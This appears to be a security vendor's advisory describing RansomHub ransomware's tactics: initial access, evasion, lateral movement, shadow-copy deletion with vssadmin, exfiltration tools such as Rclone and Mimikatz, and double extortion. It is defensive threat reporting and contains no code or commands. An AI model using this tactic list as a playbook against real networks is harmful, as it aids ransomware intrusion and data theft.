RansomHub operates as a Ransomware-as-a-Service (RaaS) platform. It allows affiliates to conduct attacks using both commodity malware and well-established adversarial techniques. Initial access often occurs through phishing campaigns or exploitation of n-day vulnerabilities using publicly available proof-of-concept (PoC) code. Password spraying and credential stuffing attacks are also used to breach network defenses.
To evade detection, the ransomware may be renamed to resemble legitimate software. Log entries and related data are removed, and security software is disabled via Windows Management Instrumentation (WMI). Once inside the network, threat actors use tools like VNC, RDP, and PsExec for lateral movement. This spreads the infection and escalates privileges. They often delete volume shadow copies on Windows systems using vssadmin.exe to prevent recovery of encrypted data.RansomHub affiliates employ multiple methods for data exfiltration.
These include using PuTTY for secure file transfers and unencrypted protocols to send data to AWS S3 storage or other cloud services. Additional tools used include:
- BITSAdmin for background file transfers
- Cobalt Strike for post-exploitation
- Rclone and WinSCP for moving files
- Mimikatz and CrackMapExec (NetExec) for credential harvesting and lateral movement
The double-extortion scheme is central to RansomHub's operation. Exfiltrated data serves as leverage to force victims into paying the ransom. If payment is not received within the given timeframe, the stolen data is published on RansomHub's Tor-based leak site. This further pressures victims and increases the risk of reputational damage.
Be immediately notified of new advisories and associated security tests